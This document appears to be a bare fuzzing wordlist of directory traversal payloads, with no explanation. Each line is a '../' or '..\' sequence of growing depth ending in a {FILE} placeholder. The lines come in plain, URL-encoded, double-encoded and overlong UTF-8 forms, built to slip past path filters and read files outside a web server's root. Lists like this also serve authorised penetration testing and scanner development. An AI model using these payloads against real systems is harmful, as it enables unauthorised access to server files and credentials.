%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
..%25c1%259c{FILE}&lt;br /&gt;
..%25c1%259c..%25c1%259c{FILE}&lt;br /&gt;
..%25c1%259c..%25c1%259c..%25c1%259c{FILE}&lt;br /&gt;
..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}&lt;br /&gt;
..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}&lt;br /&gt;
..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}&lt;br /&gt;
..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}&lt;br /&gt;
..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
..%%32%66{FILE}&lt;br /&gt;
..%%32%66..%%32%66{FILE}&lt;br /&gt;
..%%32%66..%%32%66..%%32%66{FILE}&lt;br /&gt;
..%%32%66..%%32%66..%%32%66..%%32%66{FILE}&lt;br /&gt;
..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}&lt;br /&gt;
..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}&lt;br /&gt;
..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}&lt;br /&gt;
..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
..%%35%63{FILE}&lt;br /&gt;
..%%35%63..%%35%63{FILE}&lt;br /&gt;
..%%35%63..%%35%63..%%35%63{FILE}&lt;br /&gt;
..%%35%63..%%35%63..%%35%63..%%35%63{FILE}&lt;br /&gt;
..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}&lt;br /&gt;
..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}&lt;br /&gt;
..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}&lt;br /&gt;
..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
../{FILE}&lt;br /&gt;
../../{FILE}&lt;br /&gt;
../../../{FILE}&lt;br /&gt;
../../../../{FILE}&lt;br /&gt;
../../../../../{FILE}&lt;br /&gt;
../../../../../../{FILE}&lt;br /&gt;
../../../../../../../{FILE}&lt;br /&gt;
../../../../../../../../{FILE}&lt;br /&gt;
..%2f{FILE}&lt;br /&gt;
..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
..%252f{FILE}&lt;br /&gt;
..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
..\{FILE}&lt;br /&gt;
..\..\{FILE}&lt;br /&gt;
..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
..%5c{FILE}&lt;br /&gt;
..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
..%255c{FILE}&lt;br /&gt;
..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
../{FILE}&lt;br /&gt;
../../{FILE}&lt;br /&gt;
../../../{FILE}&lt;br /&gt;
../../../../{FILE}&lt;br /&gt;
../../../../../{FILE}&lt;br /&gt;
../../../../../../{FILE}&lt;br /&gt;
../../../../../../../{FILE}&lt;br /&gt;
../../../../../../../../{FILE}&lt;br /&gt;
..%2f{FILE}&lt;br /&gt;
..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
..%252f{FILE}&lt;br /&gt;
..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
..\{FILE}&lt;br /&gt;
..\..\{FILE}&lt;br /&gt;
..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
..%5c{FILE}&lt;br /&gt;
..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
..%255c{FILE}&lt;br /&gt;
..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
